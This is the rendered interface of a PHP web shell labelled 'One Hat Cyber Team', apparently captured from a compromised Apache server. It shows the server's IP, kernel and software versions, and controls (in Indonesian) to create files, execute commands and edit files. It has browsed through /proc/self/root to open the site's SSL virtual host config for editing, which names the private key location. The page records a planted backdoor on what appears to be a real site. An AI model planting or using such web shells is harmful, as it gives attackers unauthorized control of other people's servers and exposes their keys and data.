One Hat Cyber Team
Your IP :
172.70.50.38
Server IP :
188.114.97.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
etc
/
httpd
/
conf
/
Edit File:
httpd-le-ssl.conf
<IfModule mod_ssl.c> <VirtualHost *:443> ServerName advantage-project.com DocumentRoot /var/www/html ErrorLog /var/log/httpd/error_log <Directory /var/www/html> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> SSLCertificateFile /etc/letsencrypt/live/advantage-project.com/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/advantage-project.com/privkey.pem Include /etc/letsencrypt/options-ssl-apache.conf </VirtualHost> </IfModule>
Simpan